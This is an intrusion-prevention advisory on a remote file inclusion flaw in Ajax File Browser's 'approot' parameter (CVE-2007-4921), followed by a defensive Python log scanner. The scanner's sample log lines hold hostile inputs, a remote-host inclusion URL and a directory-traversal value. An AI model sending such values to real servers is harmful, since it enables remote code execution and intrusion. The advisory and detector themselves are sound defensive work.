Intrusion Prevention

Ajax.File.Browser.approot.Parameter.File.Inclusion

Description

This indicates a file inclusion vulnerability in Ajax File Browser. The "_includes/settings.inc.php" script fails to validate the "approot" parameter, which allows remote attackers to include malicious PHP scripts and execute arbitrary commands.

Affected Products

Ajax File Browser version 3 beta 2007-08-28 and prior.

Impact

System compromise, remote script execution.

Recommended Actions

Currently we are not aware of any official fix for this issue.
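With no official fix available, web-server logs can be reviewed for requests that hand an "approot" value to the affected script. The following is an added example, not part of the original advisory or of any vendor signature. It assumes the parameter arrives in the query string and that the server writes common/combined log format; the log lines, the /afb/ install path and the triage labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

SCRIPT = "/_includes/settings.inc.php"   # script named in the advisory
PARAM = "approot"                        # parameter named in the advisory

# Request field of a common/combined log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Two or more scheme characters before ':' (so a drive letter is not a scheme)
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]+:", re.I)

def classify(value):
    """Triage label for a client-supplied approot value (labels are assumptions)."""
    if SCHEME_RE.match(value) or value.startswith(("//", "\\\\")):
        return "remote-or-wrapper"       # URL, stream wrapper or UNC-style path
    if ".." in value.replace("\\", "/").split("/"):
        return "traversal"
    return "set-by-client"               # still unexpected: clients should not set it

def scan(lines):
    """Return (line_number, label, decoded_value) for each approot sent to the script."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not unquote(parts.path).endswith(SCRIPT):
            continue
        # parse_qs percent-decodes names and values
        query = parse_qs(parts.query, keep_blank_values=True)
        for value in query.get(PARAM, []):
            findings.append((lineno, classify(value), value))
    return findings

# Constructed sample log lines (documentation addresses and hosts only)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /afb/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2008:10:00:05 +0000] "GET /afb/_includes/settings.inc.php'
    '?approot=http%3A%2F%2Fhost.example%2Fa.txt HTTP/1.1" 200 312',
    '192.0.2.44 - - [01/Jan/2008:10:00:09 +0000] "GET /afb/_includes/settings.inc.php'
    '?approot=../../tmp/ HTTP/1.1" 200 0',
    '192.0.2.51 - - [01/Jan/2008:10:01:00 +0000] "GET /afb/_includes/settings.inc.php HTTP/1.1" 200 0',
    '192.0.2.60 - - [01/Jan/2008:10:02:00 +0000] "GET /afb/_includes/settings.inc.php'
    '?approot=files HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for lineno, label, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {label}: {value!r}")
```

Any hit deserves review, because the include file is not meant to be requested directly with a caller-chosen "approot".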

CVE References

CVE-2007-4921